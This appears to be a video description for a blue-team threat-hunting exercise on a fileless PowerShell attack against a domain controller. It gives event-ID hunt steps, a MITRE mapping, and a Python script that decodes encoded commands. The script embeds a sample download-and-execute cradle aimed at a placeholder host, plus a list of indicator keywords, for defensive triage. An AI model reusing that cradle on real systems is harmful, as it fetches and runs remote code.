
Day 05/100 : Answer 👇 In Description

Answer: Day 05/100
This is a classic Fileless Malware Attack via PowerShell, Living-off-the-Land style.

What's likely happening:
Attacker executed a base64-encoded PowerShell command that ran entirely in memory and never touched the disk.

3 seconds = payload downloaded, executed, and cleaned up before EDR could scan it.

Domain Controller targeted = attacker wants the highest-privilege machine in the network.

EDR silent because no malicious file was written, so there was nothing to scan.

Attacker likely dumped credentials or created a backdoor silently in those 3 seconds.

How you hunt it:
1. Decode the base64 immediately → [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("paste here")) (PowerShell's -EncodedCommand operand is UTF-16LE, so UTF8.GetString returns garbage on it; fall back to UTF8 only if the Unicode decode is unreadable)
2. PowerShell Event ID 4104 → Script Block Logging → what was the full command? Grab it.
3. Event ID 4688 → process creation → what spawned powershell.exe?
4. Check the DC → any new scheduled tasks or services created in that window?
5. Network logs → did the DC make any outbound connections in those 3 seconds?
6. Hunt the same encoded command across all machines → was the DC the only target?
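Hunt steps 1 to 3 as one script, added here as an example and not taken from the original post: it pulls the -EncodedCommand operand out of a 4688 command line, decodes it the way PowerShell does (UTF-16LE, with a UTF-8 fallback for plain FromBase64String blobs) and flags in-memory download-and-execute indicators. The command lines and the URL are constructed samples, not real telemetry.

```python
# Added example (not from the original post): decode the Base64 of a PowerShell
# -EncodedCommand (hunt step 1) and flag in-memory execution indicators in the
# decoded script (steps 2/3). All command lines below are constructed samples.
import base64
import re

# -EncodedCommand may be abbreviated (-e, -en, -enc, ...); the operand is Base64.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Strings that commonly mark download-and-execute-in-memory PowerShell.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloaddata",
              "net.webclient", "invoke-webrequest", "frombase64string",
              "-w hidden", "-windowstyle hidden")


def decode_encoded_command(b64: str) -> str:
    """Decode -EncodedCommand Base64. PowerShell expects UTF-16LE there, so a
    UTF8.GetString() of it yields garbage; fall back to UTF-8 only when the
    bytes do not look like UTF-16LE (high byte of most code units non-zero)."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def triage_4688(command_line: str) -> dict:
    """Triage one 4688 CommandLine: decode any encoded operand and list the
    indicator hits found in the raw line or in the decoded script."""
    m = ENC_FLAG.search(command_line)
    decoded = decode_encoded_command(m.group(1)) if m else ""
    haystack = (command_line + " " + decoded).lower()
    return {"encoded": m is not None,
            "decoded": decoded,
            "indicators": sorted(i for i in INDICATORS if i in haystack)}


# Constructed samples standing in for Event ID 4688 CommandLine fields.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_4688 = [
    r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for line in SAMPLE_4688:
        r = triage_4688(line)
        print(f"encoded={r['encoded']} indicators={r['indicators']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Feed it the CommandLine field exported from 4688 events and diff the indicator hits per host to answer step 6 (was the DC the only target).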

MITRE ATT&CK Mapping:

1. T1059.001 — PowerShell (Execution)
2. T1027 — Obfuscated Files / Base64 (Defense Evasion)
3. T1140 — Deobfuscate / Decode Files (Defense Evasion)
4. T1003.001 — LSASS Memory Dump (Credential Access)
5. T1560 — Archive Collected Data (Collection)

#blueteam #soc #cybersecurity
#100daysofcybersecurity #threathunting

Video "Day 05/100 : Answer 👇 In Description" from the channel Manjil Katuwal - Hiro001